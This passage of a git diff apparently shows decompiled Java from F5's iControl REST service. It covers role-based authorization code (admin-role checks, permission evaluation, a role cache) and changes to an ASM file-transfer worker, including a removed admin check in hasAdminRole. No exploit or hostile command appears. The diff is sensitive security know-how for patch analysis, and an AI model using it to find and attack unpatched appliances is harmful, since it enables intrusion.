RolesWorker.failWithPermissionsInternalError(request);\n }\n });\n }\n \n \n private boolean hasVisibilityToRole(RestOperation request, String destinationRoleName) {\n for (RestReference identityRef : request.getAuthIdentityReferences()) {\n \n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(identityRef)) {\n continue;\n }\n \n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.userLinkToRoleNames.get(identityRef);\n \n \n if (roleNames.contains(destinationRoleName)) {\n return true;\n }\n \n \n for (String roleName : roleNames) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n String destinationRoleUriPath = (destinationRoleName == null) ? EXTERNAL_ROLES_WORKER_URI_PATH : UrlHelper.buildUriPath(new String[] { EXTERNAL_ROLES_WORKER_URI_PATH, destinationRoleName });\n \n \n if (resources.verifyResourceIsPermitted(destinationRoleUriPath, RestOperation.RestMethod.GET)) {\n return true;\n }\n }\n }\n }\n \n return false;\n }\n \n \n public boolean hasVisibilityToResourceGroup(RestOperation request, RestReference resourceGroupRef) {\n for (RestReference identityRef : request.getAuthIdentityReferences()) {\n \n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(identityRef)) {\n continue;\n }\n \n synchronized (this.userLinkToRoleNames) {\n \n Set<String> roleNames = this.userLinkToRoleNames.get(identityRef);\n \n \n if (null == roleNames || roleNames.isEmpty()) {\n continue;\n }\n \n \n Set<String> rolesWithResourceGroup = this.resourceGroupToRoleNames.get(resourceGroupRef);\n if (null != rolesWithResourceGroup) {\n for (String roleName : rolesWithResourceGroup) {\n if (roleNames.contains(roleName)) {\n return true;\n }\n }\n }\n \n \n for (String roleName : roleNames) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n if (resources.verifyResourceIsPermitted(resourceGroupRef.link.getPath(), RestOperation.RestMethod.GET)) {\n return true;\n }\n }\n }\n }\n \n return false;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setGetCollectionBodyAsync(RestOperation getRequest, RestOperation loadRequest, CompletionHandler<Void> completion) {\n String destinationRoleName = getItemIdFromRequest(getRequest);\n if (destinationRoleName == null || destinationRoleName.equals(\"Administrator\")) {\n getBuiltInRoleUserReferences(getRequest, loadRequest, completion);\n } else {\n continueSetGetCollectionBody(getRequest, loadRequest, completion);\n }\n }\n \n \n private void getBuiltInRoleUserReferences(final RestOperation getRequest, final RestOperation loadRequest, final CompletionHandler<Void> finalCompletion) {\n final String roleName = getItemIdFromRequest(getRequest);\n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation response)\n {\n RolesWorker.populateAdminUserReferencesOnGet(roleName, loadRequest, response);\n RolesWorker.this.continueSetGetCollectionBody(getRequest, loadRequest, finalCompletion);\n }\n \n \n \n public void failed(Exception ex, RestOperation response) {\n RolesWorker.this.getLogger().fineFmt(\"Unable to get list of admins/non-admins: %s\", new Object[] { ex.getMessage() });\n \n getRequest.fail(ex);\n }\n };\n \n \n RestOperation request = RestOperation.create().setUri(makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH)).setAdminIdentity().setCompletion(completion);\n \n \n \n \n sendGet(request);\n }\n \n \n static void populateAdminUserReferencesOnGet(String destinationRole, RestOperation request, RestOperation LocalRolesResponse) {\n RolesCollectionState collection = null;\n RolesWorkerState adminRole = null;\n \n if (destinationRole == null) {\n collection = (RolesCollectionState)request.getTypedBody(RolesCollectionState.class);\n for (RolesWorkerState role : collection.items) {\n if (\"Administrator\".equals(role.name)) {\n adminRole = role;\n }\n }\n } else if (destinationRole.equals(\"Administrator\")) {\n adminRole = (RolesWorkerState)request.getTypedBody(RolesWorkerState.class);\n }\n \n String localUsersPath = UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH);\n TmosLocalRolesWorkerState localState = (TmosLocalRolesWorkerState)LocalRolesResponse.getTypedBody(TmosLocalRolesWorkerState.class);\n \n \n if (adminRole != null) {\n if (adminRole.userReferences == null) {\n adminRole.userReferences = new HashSet<>();\n }\n \n \n \n Iterator<RestReference> it = adminRole.userReferences.iterator();\n while (it.hasNext()) {\n RestReference userRef = it.next();\n if (userRef.link.getPath().startsWith(localUsersPath)) {\n it.remove();\n }\n }\n \n \n for (String user : localState.administrators) {\n String userPath = UrlHelper.buildUriPath(new String[] { localUsersPath, user });\n \n adminRole.userReferences.add(new RestReference(UrlHelper.buildPublicUri(userPath)));\n }\n \n if (adminRole.userReferences.isEmpty()) {\n adminRole.userReferences = null;\n }\n }\n \n if (destinationRole == null) {\n request.setBody(collection);\n } else if (destinationRole.equals(\"Administrator\")) {\n request.setBody(adminRole);\n }\n }\n \n \n \n private void continueSetGetCollectionBody(final RestOperation getRequest, final RestOperation loadRequest, final CompletionHandler<Void> completion) {\n String destinationRoleName = getItemIdFromRequest(getRequest);\n if (destinationRoleName != null) {\n super.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n \n return;\n }\n \n RestReference userReference = getRequest.getAuthUserReference();\n if (userReference == null || AuthzHelper.isDefaultAdminRef(userReference)) {\n super.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n \n return;\n }\n \n hasAdminRole(getRequest, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n RolesWorker.this.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n return;\n }\n getRequest.setBody(RolesWorker.this.filterRoles(getRequest, loadRequest));\n completion.completed(null);\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n getRequest.setBody(null);\n getRequest.setStatusCode(500);\n completion.failed(new Exception(\"Internal server error while authorizing request\"), null);\n }\n });\n }\n \n \n \n private RolesCollectionState filterRoles(RestOperation getRequest, RestOperation loadRequest) {\n RolesCollectionState roles = (RolesCollectionState)loadRequest.getTypedBody(RolesCollectionState.class);\n Iterator<RolesWorkerState> iter = roles.items.iterator();\n while (iter.hasNext()) {\n if (!hasVisibilityToRole(getRequest, ((RolesWorkerState)iter.next()).name)) {\n iter.remove();\n }\n }\n return roles;\n }\n \n \n protected void onPatch(RestOperation request) {\n getLogger().fineFmt(\"Attempting to PATCH role; uri: %s, referrer: %s\", new Object[] { request.getUri(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n \n RestCollectionMergeResult<RolesWorkerState> mergeResult = getMergeResultFromRequest(request);\n \n \n if (((RolesWorkerState)mergeResult.clientState).userReferences != null && ((RolesWorkerState)mergeResult.storageState).userReferences != null)\n {\n ((RolesWorkerState)mergeResult.mergedState).userReferences.addAll(((RolesWorkerState)mergeResult.storageState).userReferences);\n }\n if (((RolesWorkerState)mergeResult.clientState).resourceGroupReferences != null && ((RolesWorkerState)mergeResult.storageState).resourceGroupReferences != null)\n {\n ((RolesWorkerState)mergeResult.mergedState).resourceGroupReferences.addAll(((RolesWorkerState)mergeResult.storageState).resourceGroupReferences);\n }\n \n if (((RolesWorkerState)mergeResult.clientState).resources != null && ((RolesWorkerState)mergeResult.storageState).resources != null) {\n ((RolesWorkerState)mergeResult.mergedState).resources.addAll(((RolesWorkerState)mergeResult.storageState).resources);\n }\n if (((RolesWorkerState)mergeResult.clientState).properties != null && ((RolesWorkerState)mergeResult.storageState).properties != null)\n {\n for (Map.Entry<String, Object> entry : ((RolesWorkerState)mergeResult.storageState).properties.entrySet()) {\n if (!((RolesWorkerState)mergeResult.mergedState).properties.containsKey(entry.getKey())) {\n ((RolesWorkerState)mergeResult.mergedState).properties.put(entry.getKey(), entry.getValue());\n }\n }\n }\n \n request.setBody(mergeResult.mergedState);\n updateBuiltInRoleCacheOnDemand(request);\n }\n \n \n public void onPatchCompleted(RestOperation request) {\n RolesWorkerState patchState = (RolesWorkerState)getStateFromRequest(request);\n addRole(patchState);\n request.complete();\n }\n \n \n protected void onPut(RestOperation request) {\n getLogger().fineFmt(\"Attempting to PUT role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n updateBuiltInRoleCacheOnDemand(request);\n }\n \n private RolesWorkerState getStateToUpdate(RestOperation request) {\n if (request.getMethod().equals(RestOperation.RestMethod.PATCH)) {\n RestCollectionMergeResult<RolesWorkerState> mergeResult = getMergeResultFromRequest(request);\n \n return (RolesWorkerState)mergeResult.storageState;\n }\n return (RolesWorkerState)request.getTypedBody(RolesWorkerState.class);\n }\n \n private void updateBuiltInRoleCacheOnDemand(RestOperation incomingRequest) {\n RolesWorkerState role = (RolesWorkerState)incomingRequest.getTypedBody(RolesWorkerState.class);\n \n if (role.userReferences != null &&\n \"Administrator\".equals(role.name)) {\n updateLocalRolesWorker(incomingRequest, role);\n \n return;\n }\n \n completeRequest(incomingRequest);\n }\n \n private void updateLocalRolesWorker(final RestOperation incomingRequest, RolesWorkerState role) {\n final Set<URI> localAdminUris = collectLocalUserUris(role);\n TmosLocalRolesWorkerState update = new TmosLocalRolesWorkerState();\n \n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation response)\n {\n Set<URI> remainingLocalAdminUris = new HashSet<>(localAdminUris);\n \n for (Map.Entry<URI, Boolean> entry : RolesWorker.this.tmosRoleCache.getValues().entrySet()) {\n if (entry.getValue() != Boolean.TRUE) {\n continue;\n }\n \n if (!RolesWorker.isLocalUserReference(new RestReference(entry.getKey()))) {\n continue;\n }\n \n \n if (!remainingLocalAdminUris.remove(entry.getKey())) {\n RolesWorker.this.tmosRoleCache.putValue(entry.getKey(), Boolean.FALSE);\n }\n }\n \n for (URI adminUri : remainingLocalAdminUris) {\n RolesWorker.this.tmosRoleCache.putValue(adminUri, Boolean.TRUE);\n }\n \n RolesWorker.this.completeRequest(incomingRequest);\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n RolesWorker.this.getLogger().fineFmt(\"Unable to update list of admins: %s\", new Object[] { ex.getMessage() });\n \n incomingRequest.fail(ex);\n }\n };\n \n \n for (URI adminUserRef : localAdminUris) {\n update.administrators.add(UrlHelper.getLastPathSegment(adminUserRef.getPath()));\n }\n \n if (AuthzHelper.DEFAULT_ADMIN_NAME != null) {\n if (!update.administrators.contains(AuthzHelper.DEFAULT_ADMIN_NAME)) {\n update.administrators.add(AuthzHelper.DEFAULT_ADMIN_NAME);\n \n \n role.userReferences.add(AuthzHelper.getDefaultAdminReference());\n }\n incomingRequest.setBody(role);\n }\n \n RestOperation request = RestOperation.create().setUri(makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH)).setAdminIdentity().setBody(update).setCompletion(completion);\n \n \n \n \n \n sendPost(request);\n }\n \n private static Set<URI> collectLocalUserUris(RolesWorkerState roleState) {\n Set<URI> userUris = new HashSet<>();\n for (RestReference userReference : roleState.userReferences) {\n if (RestReference.isNullOrEmpty(userReference)) {\n continue;\n }\n \n \n \n if (!isLocalUserReference(userReference)) {\n continue;\n }\n userUris.add(userReference.link);\n }\n return userUris;\n }\n \n private static boolean isLocalUserReference(RestReference userReference) {\n return userReference.link.getPath().startsWith(LOCAL_USERS_PATH);\n }\n \n \n public void onPutCompleted(RestOperation request) {\n RolesWorkerState putState = (RolesWorkerState)getStateFromRequest(request);\n addRole(putState);\n request.complete();\n }\n \n \n \n \n \n \n private void addRole(RolesWorkerState postedItem) {\n synchronized (this.userLinkToRoleNames) {\n \n \n \n this.roleNameToResources.put(postedItem.name, buildResourcesList(postedItem));\n \n \n \n if (postedItem.userReferences != null) {\n addRolesToUsers(postedItem.name, postedItem.userReferences);\n }\n if (postedItem.resourceGroupReferences != null) {\n addRolesToResourceGroups(postedItem.name, postedItem.resourceGroupReferences);\n }\n \n \n for (Map.Entry<RestReference, Set<String>> entry : this.userLinkToRoleNames.entrySet()) {\n \n if (((Set)entry.getValue()).contains(postedItem.name) && (postedItem.userReferences == null || !postedItem.userReferences.contains(entry.getKey())))\n {\n \n ((Set)entry.getValue()).remove(postedItem.name);\n }\n }\n \n for (Map.Entry<RestReference, Set<String>> entry : this.resourceGroupToRoleNames.entrySet()) {\n \n if (((Set)entry.getValue()).contains(postedItem.name) && (postedItem.resourceGroupReferences == null || !postedItem.resourceGroupReferences.contains(entry.getKey())))\n {\n \n ((Set)entry.getValue()).remove(postedItem.name);\n }\n }\n }\n }\n \n \n \n private void addRolesToUsers(String roleName, Set<RestReference> users) {\n for (RestReference userReference : users) {\n if (userReference.link == null) {\n getLogger().warningFmt(\"Null userReference in role %s\", new Object[] { roleName });\n continue;\n }\n getLogger().finestFmt(\"Adding role %s from %s\", new Object[] { roleName, userReference.link.toString() });\n \n if (this.userLinkToRoleNames.containsKey(userReference)) {\n ((Set<String>)this.userLinkToRoleNames.get(userReference)).add(roleName);\n continue;\n }\n Set<String> roleSet = new HashSet<>();\n roleSet.add(roleName);\n this.userLinkToRoleNames.put(userReference, roleSet);\n }\n }\n \n \n \n \n private void addRolesToResourceGroups(String roleName, Set<RestReference> resourceGroups) {\n for (RestReference resourceGroup : resourceGroups) {\n if (resourceGroup.link == null) {\n getLogger().warningFmt(\"Null userReference in role %s\", new Object[] { roleName });\n continue;\n }\n getLogger().finestFmt(\"Adding role %s to %s\", new Object[] { roleName, resourceGroup.link.toString() });\n \n if (this.resourceGroupToRoleNames.containsKey(resourceGroup)) {\n ((Set<String>)this.resourceGroupToRoleNames.get(resourceGroup)).add(roleName);\n continue;\n }\n Set<String> roleSet = new HashSet<>();\n roleSet.add(roleName);\n this.resourceGroupToRoleNames.put(resourceGroup, roleSet);\n }\n }\n \n \n \n private void removeRolesFromUsers(String roleName, Set<RestReference> users) {\n for (RestReference userReference : users) {\n if (userReference.link == null) {\n continue;\n }\n if (this.userLinkToRoleNames.containsKey(userReference)) {\n getLogger().finestFmt(\"Removing role %s from %s\", new Object[] { roleName, userReference.link.toString() });\n \n ((Set)this.userLinkToRoleNames.get(userReference)).remove(roleName);\n }\n }\n }\n \n \n \n \n private void removeRolesFromResourceGroups(String roleName, Set<RestReference> resourceGroups) {\n for (RestReference groupReference : resourceGroups) {\n if (groupReference.link == null) {\n continue;\n }\n if (this.resourceGroupToRoleNames.containsKey(groupReference)) {\n getLogger().finestFmt(\"Removing role %s from %s\", new Object[] { roleName, groupReference.link.toString() });\n \n ((Set)this.resourceGroupToRoleNames.get(groupReference)).remove(roleName);\n }\n }\n }\n \n \n \n public void onDelete(RestOperation request) {\n getLogger().fineFmt(\"Attempting to DELETE role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n completeDelete(request);\n }\n \n \n public void onDeleteCompleted(RestOperation request) {\n RolesWorkerState item = (RolesWorkerState)getStateFromRequest(request);\n \n synchronized (this.userLinkToRoleNames) {\n if (item.userReferences != null) {\n removeRolesFromUsers(item.name, item.userReferences);\n }\n \n \n if (item.resourceGroupReferences != null) {\n removeRolesFromResourceGroups(item.name, item.resourceGroupReferences);\n }\n \n this.roleNameToResources.remove(item.name);\n }\n \n request.complete();\n }\n \n \n \n \n \n \n public void onPost(RestOperation request) {\n getLogger().fineFmt(\"Attempting to POST role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n updateBuiltInRoleCacheOnDemand(request);\n }\n \n \n public void onPostCompleted(RestOperation request) {\n RolesWorkerState postedItem = (RolesWorkerState)getStateFromRequest(request);\n addRole(postedItem);\n request.complete();\n }\n \n \n \n \n \n \n \n private boolean isReadOnly(RestOperation request) {\n if (!isExternalRequest(request)) {\n return false;\n }\n \n RolesWorkerState updateState = getStateToUpdate(request);\n if (request.getMethod().equals(RestOperation.RestMethod.DELETE) && (updateState.name.equals(\"iControl_REST_API_User\") || updateState.name.equals(\"Administrator\"))) {\n \n \n \n request.fail(new IllegalStateException(String.format(\"Cannot %s built in roles.\", new Object[] { \"delete\" })));\n \n return true;\n }\n \n return false;\n }\n \n \n \n \n \n \n \n private static boolean isExternalRequest(RestOperation request) {\n return (request.getReferer() != null && !request.getReferer().endsWith(TmosBuiltInRolesWorkerState.WORKER_PATH) && !request.getReferer().contains(RemoteStateCopier.class.getName()) && !request.getReferer().contains(\"shared/gossip\") && !request.getReferer().endsWith(WellKnownPorts.AUTHZ_TMOS_ROLES_SYNC_WORKER_URI_PATH));\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void evaluatePermission(final RestOperation request, final String path, final RestOperation.RestMethod verb, final CompletionHandler<Boolean> completion) {\n if (isAllowedToAll(path, verb)) {\n completion.completed(Boolean.valueOf(true));\n \n return;\n }\n hasAdminRole(request, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n completion.completed(Boolean.valueOf(true));\n \n return;\n }\n completion.completed(Boolean.valueOf(RolesWorker.this.evaluatePermission(request, path, verb)));\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n completion.failed(ex, Boolean.valueOf(false));\n }\n });\n }\n \n \n \n \n private static boolean isAllowedToAll(String path, RestOperation.RestMethod verb) {\n if (verb == RestOperation.RestMethod.POST && (path.equals(EXTERNAL_EFFECTIVE_PERMISSIONS_WORKER_PATH) || path.startsWith(EXTERNAL_LOGIN_WORKER_PATH)))\n {\n \n return true;\n }\n \n \n \n \n if (verb == RestOperation.RestMethod.GET && (path.startsWith(EXTERNAL_ROLES_WORKER_URI_PATH) || path.startsWith(EXTERNAL_RESOURCE_GROUPS_WORKER_URI_PATH)))\n {\n \n return true;\n }\n \n return false;\n }\n \n \n private boolean evaluatePermission(RestOperation request, String path, RestOperation.RestMethod verb) {\n for (RestReference identityReference : request.getAuthIdentityReferences()) {\n if (evaluatePermission(identityReference, path, verb)) {\n return true;\n }\n }\n \n return false;\n }\n \n \n private boolean evaluatePermission(RestReference userLink, String path, RestOperation.RestMethod verb) {\n if (path.equals(userLink.link.getPath())) {\n return true;\n }\n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n \n synchronized (this.userLinkToRoleNames) {\n \n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n \n for (String roleName : this.userLinkToRoleNames.get(userLink)) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n if (resources.verifyResourceIsPermitted(path, verb)) {\n return true;\n }\n }\n }\n return false;\n }\n \n public void hasAdminRole(RestOperation request, CompletionHandler<Boolean> completion) {\n for (RestReference groupReference : request.getAuthGroupReferencesList()) {\n if (hasAdminRoleFromGroup(groupReference)) {\n completion.completed(Boolean.valueOf(true));\n return;\n }\n }\n RestReference authUserReference = request.getAuthUserReference();\n if (RestReference.isNullOrEmpty(authUserReference)) {\n completion.completed(null);\n return;\n }\n - if (!hasAdminRoleFromGroup(authUserReference)) {\n - completion.completed(null);\n - return;\n - }\n this.tmosRoleCache.get(authUserReference.link, completion);\n }\n \n private boolean hasAdminRoleFromGroup(RestReference userLink) {\n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.userLinkToRoleNames.get(userLink);\n return (roleNames != null && roleNames.contains(\"Administrator\"));\n }\n }\n \n private RoleResourceMatcher buildResourcesList(RolesWorkerState role) {\n Set<RoleResource> resources = new HashSet<>();\n \n if (role.resources != null) {\n resources.addAll(role.resources);\n }\n \n if (role.resourceGroupReferences != null) {\n for (RestReference resourceGroupReference : role.resourceGroupReferences) {\n if (RestReference.isNullOrEmpty(resourceGroupReference)) {\n continue;\n }\n Set<RoleResource> groupResources = this.resourcesGroupWorker.getRoleResourcesFromGroup(resourceGroupReference.link);\n \n if (groupResources != null) {\n resources.addAll(groupResources);\n }\n }\n }\n \n return new RoleResourceMatcher(resources);\n }\n \n \n \n private void queueUserRemoval(RestReference userReference) {\n getLogger().fineFmt(\"Queued removal of %s from roles.\", new Object[] { userReference.link });\n \n synchronized (this.userLinkToRoleNames) {\n if (!this.userLinkToRoleNames.containsKey(userReference)) {\n return;\n }\n }\n \n this.usersToRemove.add(userReference);\n processUserRemovalQueue();\n }\n \n \n private void completedUserRemoval() {\n this.isUserRemovalRunning.set(false);\n processUserRemovalQueue();\n }\n \n private void processUserRemovalQueue() {\n if (this.isUserRemovalRunning.compareAndSet(false, true)) {\n removeNextUser();\n }\n }\n \n private void removeNextUser() {\n RestReference userRef = this.usersToRemove.poll();\n \n if (userRef == null) {\n this.isUserRemovalRunning.set(false);\n \n return;\n }\n getLogger().fineFmt(\"Processing %s for removal from roles\", new Object[] { userRef.link });\n \n Set<String> roles = null;\n \n synchronized (this.userLinkToRoleNames) {\n if (this.userLinkToRoleNames.containsKey(userRef)) {\n roles = new HashSet<>(this.userLinkToRoleNames.get(userRef));\n }\n }\n \n if (roles == null || roles.isEmpty()) {\n completedUserRemoval();\n \n return;\n }\n for (String role : roles) {\n removeUserFromRole(userRef, role);\n }\n }\n \n \n private void removeUserFromRole(final RestReference userReference, final String roleName) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().fineFmt(\"Unable to GET %s to remove %s: %s\", new Object[] { this.val$roleName, this.val$userReference.link.toString(), ex });\n \n RolesWorker.this.completedUserRemoval();\n }\n \n \n public void completed(RestOperation operation) {\n final RolesWorkerState role = (RolesWorkerState)operation.getTypedBody(RolesWorkerState.class);\n if (!role.userReferences.remove(userReference) && !\"Administrator\".equals(roleName)) {\n \n RolesWorker.this.completedUserRemoval();\n return;\n }\n RestRequestCompletion putCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation putResponse)\n {\n if (putResponse.getStatusCode() == 404) {\n RolesWorker.this.completedUserRemoval();\n \n return;\n }\n RolesWorker.this.getLogger().fineFmt(\"Unable to update %s to remove %s, will retry. Error: %s\", new Object[] { this.val$role.name, this.this$1.val$userReference.link.toString(), ex });\n \n \n \n RolesWorker.this.queueUserRemoval(userReference);\n }\n \n \n \n public void completed(RestOperation putResponse) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully removed %s from role %s\", new Object[] { this.this$1.val$userReference.link.toString(), this.val$role.name });\n \n RolesWorker.this.completedUserRemoval();\n }\n };\n \n \n RestOperation put = RestOperation.create().setUri(UrlHelper.extendUriSafe(RolesWorker.this.getUri(), new String[] { this.val$roleName })).setBody(role).setCompletion(putCompletion);\n \n \n \n RolesWorker.this.sendPut(put);\n }\n };\n \n RestOperation get = RestOperation.create().setUri(UrlHelper.extendUriSafe(getUri(), new String[] { roleName })).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n void removeResourceGroupsFromRoles(RestReference groupReference) {\n Set<String> roles = null;\n \n synchronized (this.userLinkToRoleNames) {\n if (this.resourceGroupToRoleNames.containsKey(groupReference)) {\n roles = new HashSet<>(this.resourceGroupToRoleNames.get(groupReference));\n }\n }\n \n if (roles == null) {\n return;\n }\n \n for (String role : roles) {\n removeResourceGroupFromRole(groupReference, role, 10);\n }\n }\n \n \n \n void removeResourceGroupFromRole(final RestReference groupReference, final String roleName, final int retries) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().fineFmt(\"Failed to remove %s from role %s: %s\", new Object[] { this.val$groupReference.link.toString(), this.val$roleName, ex });\n }\n \n \n \n public void completed(RestOperation operation) {\n final RolesWorkerState role = (RolesWorkerState)operation.getTypedBody(RolesWorkerState.class);\n if (!role.resourceGroupReferences.remove(groupReference)) {\n return;\n }\n RestRequestCompletion putCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation putResponse)\n {\n if (retries <= 0) {\n RolesWorker.this.getLogger().warningFmt(\"Failed to remove %s from role %s: %s\", new Object[] { this.this$1.val$groupReference.link.toString(), this.val$role.name, ex });\n \n return;\n }\n TimerTask task = new TimerTask()\n {\n public void run()\n {\n RolesWorker.this.removeResourceGroupFromRole(groupReference, roleName, retries - 1);\n }\n };\n \n \n \n RolesWorker.this.scheduleTask(task, true, (10 - retries) * 10, 0, 1);\n }\n \n \n public void completed(RestOperation putResponse) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully removed %s from role %s\", new Object[] { this.this$1.val$groupReference.link.toString(), this.val$role.name });\n }\n };\n \n \n \n RestOperation put = RestOperation.create().setUri(UrlHelper.extendUriSafe(RolesWorker.this.getUri(), new String[] { this.val$roleName })).setBody(role).setCompletion(putCompletion);\n \n \n \n RolesWorker.this.sendPut(put);\n }\n };\n \n RestOperation get = RestOperation.create().setUri(UrlHelper.extendUriSafe(getUri(), new String[] { roleName })).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n \n void rebuildRolesWithRef(final URI resourceGroupSelfLink, final RestOperation groupRequest) {\n RestRequestCompletion getCollectionCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to rebuild role resources: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesCollectionState collection = (RolesCollectionState)operation.getTypedBody(RolesCollectionState.class);\n \n \n RestReference resourceGroup = new RestReference(resourceGroupSelfLink);\n RolesWorker.this.rebuildResources(collection, resourceGroup);\n RolesWorker.this.resourcesGroupWorker.onRoleRebuildComplete(groupRequest);\n }\n };\n \n \n loadChildValues(getCollectionCompletion);\n }\n \n \n \n \n \n \n \n void rebuildAllRoles() {\n RestRequestCompletion getCollectionCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to rebuild role resources: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesCollectionState collection = (RolesCollectionState)operation.getTypedBody(RolesCollectionState.class);\n \n synchronized (RolesWorker.this.userLinkToRoleNames) {\n for (RolesWorkerState role : collection.items) {\n RolesWorker.this.roleNameToResources.put(role.name, RolesWorker.this.buildResourcesList(role));\n }\n }\n }\n };\n \n \n loadChildValues(getCollectionCompletion);\n }\n \n \n void rebuildResources(RolesCollectionState collection, RestReference resourceGroup) {\n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.resourceGroupToRoleNames.get(resourceGroup);\n if (roleNames == null) {\n return;\n }\n \n for (RolesWorkerState role : collection.items) {\n if (roleNames.contains(role.name)) {\n this.roleNameToResources.put(role.name, buildResourcesList(role));\n }\n }\n }\n }\n \n \n public static void failWithPermissionsInternalError(RestOperation request) {\n request.setBody(null);\n request.setStatusCode(500);\n request.fail(new Exception(\"Internal server error while authorizing request\"));\n }\n \n public void invalidateCacheForUser(URI userSelfLink) {\n this.tmosRoleCache.invalidate(userSelfLink);\n }\n }\n diff --git a/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java b/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java\n new file mode 100644\n index 0000000..99c2bd4\n --- /dev/null\n +++ b/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java\n @@ -0,0 +1,26 @@\n +package com.f5.rest.workers.asm;\n +\n +import java.util.ArrayList;\n +import java.util.List;\n +\n +public class AsmFileTransferConfiguration\n +{\n + List<String> allowedFileFormat = new ArrayList<>();\n +\n + public List<String> getAllowedFileFormat() {\n + return this.allowedFileFormat;\n + }\n +\n + public void setAllowedFileFormat(List<String> paramList) {\n + this.allowedFileFormat = paramList;\n + }\n +\n + public String getAllowedFileFormatAsString(String paramString) {\n + StringBuilder stringBuilder = new StringBuilder();\n + for (String str : this.allowedFileFormat) {\n + stringBuilder.append(str).append(paramString);\n + }\n + stringBuilder.deleteCharAt(stringBuilder.lastIndexOf(paramString));\n + return stringBuilder.toString();\n + }\n +}\n diff --git a/com/f5/rest/workers/asm/AsmFileTransferWorker.java b/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n index 87e0610..16144f9 100644\n --- a/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n +++ b/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n @@ -1,133 +1,162 @@\n package com.f5.rest.workers.asm;\n \n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.UrlHelper;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n +import com.f5.rest.workers.asm.utils.AsmRequestValidator;\n +import com.f5.rest.workers.asm.utils.ValidationResponse;\n import java.net.URI;\n import java.util.ArrayList;\n import java.util.List;\n +import java.util.logging.Logger;\n \n \n \n public class AsmFileTransferWorker\n extends RestWorker\n {\n + private final Logger LOGGER = Logger.getLogger(AsmFileTransferWorker.class.getSimpleName());\n private String postDirectory;\n private String tmpDirectory;\n private String getDirectory;\n private final String PRIVATE_SUFFIX = \"-private\";\n private boolean isDownload;\n private String localUri;\n \n public AsmFileTransferWorker(String paramString1, String paramString2, String paramString3) throws Exception {\n this.postDirectory = paramString2;\n this.tmpDirectory = paramString3;\n this.isDownload = false;\n this.localUri = paramString1;\n }\n \n public AsmFileTransferWorker(String paramString1, String paramString2) throws Exception {\n this.getDirectory = paramString2;\n this.isDownload = true;\n this.localUri = paramString1;\n }\n \n \n \n public void onStart(RestServer paramRestServer) throws Exception {\n if (this.isDownload) {\n \n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.getDirectory);\n - fileTransferWorker.setPublic(false);\n - getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferWorker);\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.getDirectory);\n + fileTransferPrivateWorker.setPublic(false);\n + getServer().registerWorker(this.localUri + \"-private\", 